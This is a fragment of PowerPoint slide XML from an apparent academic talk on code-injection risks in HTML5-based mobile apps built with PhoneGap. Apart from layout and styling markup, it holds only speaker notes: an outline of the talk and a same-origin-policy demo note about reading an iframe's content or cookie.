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</p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:lvl1pPr>
      <a:defRPr sz="1400">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr>
      <a:defRPr sz="1400">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr>
      <a:defRPr sz="1400">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr>
      <a:defRPr sz="1400">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr>
      <a:defRPr sz="1400">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr>
      <a:defRPr sz="1400">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr>
      <a:defRPr sz="1400">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr>
      <a:defRPr sz="1400">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr>
      <a:defRPr sz="1400">
        <a:latin typeface="+mj-lt"/>
        <a:ea typeface="+mj-ea"/>
        <a:cs typeface="+mj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1F3"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:wholeTbl>
    <a:band2H>
      <a:tcTxStyle/>
      <a:tcStyle>
        <a:tcBdr/>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="E9F1F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A81BA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A81BA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A81BA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D7E6"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:wholeTbl>
    <a:band2H>
      <a:tcTxStyle/>
      <a:tcStyle>
        <a:tcBdr/>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="E7ECF3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A81BA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A81BA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A81BA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AE2CD"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:wholeTbl>
    <a:band2H>
      <a:tcTxStyle/>
      <a:tcStyle>
        <a:tcBdr/>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="EDF1E8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BAB42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BAB42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BAB42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CCCC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63334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63334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63334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A81BA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A81BA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92311804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18" name="Shape 3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Here is the outline of my presentation. First, I will give a overview of HTML5-based Mobile App and PhoneGap Architecture. PhoneGap is a popular middleware framework that</a:t>
            </a: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can be used to develop HTML5-based mobile apps. We will also talk about the risks in JavaScript, which is the fundamental cause of the attack we have identified. Then I will talk about the attack by listing the channels and showing some examples. I will also show one of the real vulnerable app that we found in the android market. At last , I will list</a:t>
            </a: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our future work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41543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3" name="Shape 5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00000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pP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Demo here: http://www.w3schools.com/jsref/tryit.asp?filename=tryjsref_iframe_contentdocument2 with original, wikipedia, and google. Show dev tools for error. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Try to read body.innerHTML or document.cookie. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246976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2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4800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685800" y="2840053"/>
            <a:ext cx="7772400" cy="230344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666666"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="66666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66666"/>
                </a:solidFill>
              </a:rP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-9527" y="-5957"/>
            <a:ext cx="9163054" cy="7810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1476AB">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0CE0EC">
                  <a:alpha val="549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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/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4381498" y="-5957"/>
            <a:ext cx="4762504" cy="455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18A7B0">
                  <a:alpha val="29802"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="80000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="57" name="Group 57"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-25427" y="-66218"/>
            <a:ext cx="9190331" cy="902325"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="9190329" cy="902324"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="Shape 55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21435692">
              <a:off x="5876" y="218624"/>
              <a:ext cx="9163027" cy="465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75" cap="flat">
              <a:solidFill>
                <a:srgbClr val="33B7B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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr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21435692">
              <a:off x="10703" y="273582"/>
              <a:ext cx="9175788" cy="379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10CF9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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp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85317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573"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457200" y="1440062"/>
            <a:ext cx="4038599" cy="3703440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573"/>
          <a:lstStyle/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xfrm>
            <a:off x="7924800" y="4901405"/>
            <a:ext cx="762000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-9527" y="-5957"/>
            <a:ext cx="9163054" cy="7810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1476AB">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0CE0EC">
                  <a:alpha val="549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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr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4381498" y="-5957"/>
            <a:ext cx="4762504" cy="455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18A7B0">
                  <a:alpha val="29802"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="80000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="Group 66"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-25427" y="-66218"/>
            <a:ext cx="9190331" cy="902325"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="9190329" cy="902324"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="Shape 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21435692">
              <a:off x="5876" y="218624"/>
              <a:ext cx="9163027" cy="465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75" cap="flat">
              <a:solidFill>
                <a:srgbClr val="33B7B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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr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rot="21435692">
              <a:off x="10703" y="273582"/>
              <a:ext cx="9175788" cy="379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10CF9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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp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85317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573"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xfrm>
            <a:off x="457200" y="1385316"/>
            <a:ext cx="4040188" cy="506758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573" anchor="ctr"/>
          <a:lstStyle/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xfrm>
            <a:off x="7924800" y="4901405"/>
            <a:ext cx="762000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-9527" y="-5957"/>
            <a:ext cx="9163054" cy="7810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1476AB">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0CE0EC">
                  <a:alpha val="549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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr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4381498" y="-5957"/>
            <a:ext cx="4762504" cy="455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18A7B0">
                  <a:alpha val="29802"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="80000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="75" name="Group 75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-25427" y="-66218"/>
            <a:ext cx="9190331" cy="902325"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="9190329" cy="902324"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="Shape 73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21435692">
              <a:off x="5876" y="218624"/>
              <a:ext cx="9163027" cy="465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75" cap="flat">
              <a:solidFill>
                <a:srgbClr val="33B7B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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr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21435692">
              <a:off x="10703" y="273582"/>
              <a:ext cx="9175788" cy="379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10CF9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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp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385317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573"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xfrm>
            <a:off x="7924800" y="4901405"/>
            <a:ext cx="762000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-9527" y="-5957"/>
            <a:ext cx="9163054" cy="7810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1476AB">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0CE0EC">
                  <a:alpha val="549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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr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4381498" y="-5957"/>
            <a:ext cx="4762504" cy="455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18A7B0">
                  <a:alpha val="29802"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="80000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="83" name="Group 83"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-25427" y="-66218"/>
            <a:ext cx="9190331" cy="902325"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="9190329" cy="902324"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Shape 81"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21435692">
              <a:off x="5876" y="218624"/>
              <a:ext cx="9163027" cy="465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75" cap="flat">
              <a:solidFill>
                <a:srgbClr val="33B7B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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr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rot="21435692">
              <a:off x="10703" y="273582"/>
              <a:ext cx="9175788" cy="379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10CF9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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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xfrm>
            <a:off x="7924800" y="4901405"/>
            <a:ext cx="762000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-9527" y="-5957"/>
            <a:ext cx="9163054" cy="7810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1476AB">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0CE0EC">
                  <a:alpha val="549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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr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4381498" y="-5957"/>
            <a:ext cx="4762504" cy="455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18A7B0">
                  <a:alpha val="29802"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="80000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="90" name="Group 90"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-25427" y="-66218"/>
            <a:ext cx="9190331" cy="902325"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="9190329" cy="902324"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="88" name="Shape 88"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21435692">
              <a:off x="5876" y="218624"/>
              <a:ext cx="9163027" cy="465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75" cap="flat">
              <a:solidFill>
                <a:srgbClr val="33B7B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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr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 rot="21435692">
              <a:off x="10703" y="273582"/>
              <a:ext cx="9175788" cy="379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10CF9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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp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  <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573"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xfrm>
            <a:off x="685800" y="1257300"/>
            <a:ext cx="2743200" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573"/>
          <a:lstStyle/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xfrm>
            <a:off x="7924800" y="4901405"/>
            <a:ext cx="762000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-9527" y="-5957"/>
            <a:ext cx="9163054" cy="7810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1476AB">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0CE0EC">
                  <a:alpha val="549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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr>
            </a:pP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4381498" y="-5957"/>
            <a:ext cx="4762504" cy="455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18A7B0">
                  <a:alpha val="29802"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="80000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="99" name="Group 99"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-25427" y="-66218"/>
            <a:ext cx="9190331" cy="902325"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="9190329" cy="902324"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="97" name="Shape 97"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21435692">
              <a:off x="5876" y="218624"/>
              <a:ext cx="9163027" cy="465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75" cap="flat">
              <a:solidFill>
                <a:srgbClr val="33B7B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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr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 rot="21435692">
              <a:off x="10703" y="273582"/>
              <a:ext cx="9175788" cy="379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10CF9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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Shape 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="11220000" flipH="1">
            <a:off x="3165474" y="831052"/>
            <a:ext cx="5257804" cy="30861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138" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="788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rnd">
            <a:solidFill>
              <a:srgbClr val="C0C0C0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pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Shape 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="11220000" flipH="1">
            <a:off x="8004175" y="4019551"/>
            <a:ext cx="155574" cy="1166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pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Shape 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-9527" y="4362448"/>
            <a:ext cx="9163054" cy="781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1476AB">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0CE0EC">
                  <a:alpha val="549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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Shape 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4381498" y="4688064"/>
            <a:ext cx="4762504" cy="4554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18A7B0">
                  <a:alpha val="29802"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="80000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr>
            </a:pPr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609600" y="0"/>
            <a:ext cx="2212851" cy="2069714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573"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609600" y="2121586"/>
            <a:ext cx="2209800" cy="3021915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef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106" name="Shape 106"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8077200" y="4901405"/>
            <a:ext cx="609599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-9527" y="-5957"/>
            <a:ext cx="9163054" cy="7810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1476AB">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0CE0EC">
                  <a:alpha val="549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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr>
            </a:pP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4381498" y="-5957"/>
            <a:ext cx="4762504" cy="455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18A7B0">
                  <a:alpha val="29802"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="80000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0993DD">
                  <a:alpha val="44705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Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="112" name="Group 112"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-25427" y="-66218"/>
            <a:ext cx="9190331" cy="902325"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="9190329" cy="902324"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="110" name="Shape 110"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21435692">
              <a:off x="5876" y="218624"/>
              <a:ext cx="9163027" cy="465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75" cap="flat">
              <a:solidFill>
                <a:srgbClr val="33B7B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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr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rot="21435692">
              <a:off x="10703" y="273582"/>
              <a:ext cx="9175788" cy="379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10CF9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Merriweather"/>
                  <a:ea typeface="Merriweather"/>
                  <a:cs typeface="Merriweather"/>
                  <a:sym typeface="Merriweather"/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp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457200" y="-3789369"/>
            <a:ext cx="8229600" cy="863603"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573">
            <a:spAutoFit/>
          </a:bodyPr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xfrm rot="5400000">
            <a:off x="-17648048" y="-21591397"/>
            <a:ext cx="3292082" cy="8229606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="68573" tIns="68573" rIns="68573" bIns="68573">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="203200" indent="-88900">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Helvetica"/>
              <a:buChar char="●"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="482600" indent="-88900">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
